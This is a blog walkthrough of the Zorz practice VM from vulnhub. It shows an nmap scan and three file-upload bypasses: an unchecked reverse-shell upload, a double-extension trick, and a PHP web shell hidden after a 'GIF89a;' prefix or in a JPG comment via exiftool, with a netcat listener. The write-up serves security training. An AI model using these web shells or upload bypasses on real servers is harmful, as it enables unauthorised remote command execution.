Walkthrough Zorz

I have been playing around with another vulnerable VM, this one is called Zorz, and can be found here on vulnhub. It is made by Top-hat-sec.

First I imported the VM, but it automatically used eth0, instead of wlan. So once that was changed I could find the machine when I did my scan.

nmap -v

I have started running nmap in verbose mode, because it can be fun to see how nmap is working, and especially if it is really slow, and I start to doubt that everything is really working as it should.

sudo nmap -A -T4 -p-

So this stands for -A: Aggressive, and it includes: OS detection, version detection, script scanning, and traceroute.

-T4 is how fast the scanning should be. -T4 is “aggressive”, but not -T5 “insane”. So it works out fast, but still reliable. Although it doesn’t really matter. I think it is more useful when you need to scan hundreds of networks. In how much of a hurry you are. Granted T0 is slooow. -T3 is the default.

Starting Nmap 7.00 ( https://nmap.org ) at 2016-04-23 21:23 CLST
Nmap scan report for zorz.dev (
Host is up (0.0011s latency).
Not shown: 65533 closed ports
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 48:bb:d8:38:b8:25:a6:6c:5e:7f:67:c9:ec:53:cc:ed (DSA)
|   2048 ec:55:48:93:28:90:f6:bf:3c:cd:e3:90:42:26:3b:5d (RSA)
|_  256 3f:0a:11:c9:59:73:be:df:f7:77:59:65:07:91:d7:d6 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:9A:0D:2F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS out CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   1.08 ms zorz.dev (

Okay, so we just have ssh and 80. Let’s start ZAP and Dir-browsing, because that can take some time. And let that roll while we checkout the browser.

Challenge 1

So we find three challenges. Three ways to upload images to the server. So I guess that we want to bypass the image-restrictions and upload shells instead.

The first one was really straight-forward. It didn’t really do any check. So I could just upload php-reverse-shell.php without any problems. But where was the file? I continued to play with Challenge 2 and 3. On the third one it says where the file was uploaded. It was uploaded into a dir called uploads3. So I figured the files for challenge 1 and 2 were to be found in uploads1 and uploads 2.

So I opened port 1234 in the firewall with the command:

ufw allow 1234

And then I used netcat to start listening in on that port, and get ready for the shell.

nc -v -l 1234

So -v stands for verbose. -l for listen. So that netcat know that it should listed for a incoming connection, and not establish connection itself. 1234 is the port that it should listen to.
Now we just click on the shell-file in uploads1 and the server connects to netcat.

So year, this was pretty easy. Basically no check whatsoever.

Challenge 2

Now it is getting a bit more difficult. We cannot upload file that does not end with .png, .jpg, .gif.

But instead we can just rename our shell and upload it as shell.php.jpg. It passed the filter and the file is executed as php.

Challenge 3

This challenge was a bit harder. Because somehow it was checking to see if the file itself was an image. I found to ways to bypass this check.
From this great tutorial I learned how to get around it. Basically you just add the text “GIF89a;” before you shell-code. So it would look something like this:

system($_GET['cmd']);//or you can insert your complete shell code

So that worked and I managed to get a shell up and running.

The second way to beat this challenge is to add the shell-code into a comment of a image-file.

First I looked for a simple jpg file online “jpg file:jpg”. And then I inserted the php-code into the image comment with the following command.

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' lo.jpg 

Exiftool is a great tool to view and manipulate exif-data.
Then I had to rename the file

mv lo.jpg lo.php.jpg

Then upload it. When I then click on it the browser just outputs jibberish.


So when we run this in the browser it outputs the result on the webpage. So yeah, we have a shell.

Then we can move to
And see the win-file.

There are many more tricks to bypass fileupload restrictions. Here are some:


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s